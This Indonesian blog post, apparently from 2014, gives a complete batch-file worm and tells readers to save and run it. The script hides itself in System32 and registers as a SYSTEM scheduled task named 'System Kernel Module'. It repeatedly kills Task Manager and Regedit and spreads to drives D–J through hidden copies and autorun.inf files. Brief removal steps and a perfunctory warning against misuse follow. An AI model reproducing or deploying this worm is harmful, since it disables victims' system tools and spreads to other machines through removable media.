Friday, February 28, 2014

Cara Bikin Worm Sederhana Tapi Mematikan


Nih cara bikin worm. Sesuai dengan judul di atas kita dapat membuat worm yang sangat sederhana tetapi sangat ampuh untuk memporak2dakan komputer terutama untuk menonaktifkan Task Manager dan Registry Tools.

Ini nih scriptnya :

@echo off
If Exist C:\Windows\System32\boot.bat (

GoTo Mulai) Else (
GoTo Buat)

:Buat
Xcopy /h /y /q %0 c:\windows\system32
cls
Attrib +s +h +r c:\windows\system32\boot.bat
If Exist C:\windows\tasks\*job (

Attrib -s -h -r c:\windows\tasks\*job
Del /s /q c:\windows\tasks\*job
)
SchTasks /Create /Tn "System Kernel Module" /Tr "c:\windows\system32\boot.bat" /Sc Onidle /I "2" /Ru System
cls
SchTasks /Run /Tn "System Kernel Module"
Exit

:Mulai
Taskkill /f /t /im Taskmgr.exe
Taskkill /f /t /im Regedit.exe

For %%a in (
d: e: f: g: h: i: j:) Do (

If Exist %%a\* (
Attrib -s -h -r %%a\boot.bat
Xcopy /h /y /q c:\windows\system32\boot.bat %%a
Attrib +s +h +r %%a\boot.bat
Attrib -s -h -r %%a\autorun.inf
Echo [autorun]>%%a\autorun.inf
Echo shellexecute=boot.bat>>%%a\autorun.inf
Echo action=Open folder to view files>>%%a\autorun.inf
Echo icon=c:\windows\system32\shell32.dll,4 >>%%a\autorun.inf
Attrib +s +h +r %%a\autorun.inf

)
)
GoTo Mulai


Terus save scriptnya pake extensi .bat, terus coba buka deh file yang barusan di save ^^
Ini cara membasminya, masa bisa bikin ga bisa ngilangin ^^

Start ○► Run lalu ketik "tasks" lalu klik kanan file "System Kernel Module" / Buka task manager terus pilih End.
\Start ○► Run lalu ketik "cmd" terus tulis comand ini:

Attrib -s -h -r c:\windows\system32\boot.bat
Del /q c:\windows\system32\boot.bat


#boot.bat itu tergantung dari nama file .bat yang agan save tadi

WARNING Jangan Gunakan Ilmu ini Untuk Kejahatan.... 
Gunakan Untuk Kebajikan aja brow

SALAM SUKSES

No comments:

Post a Comment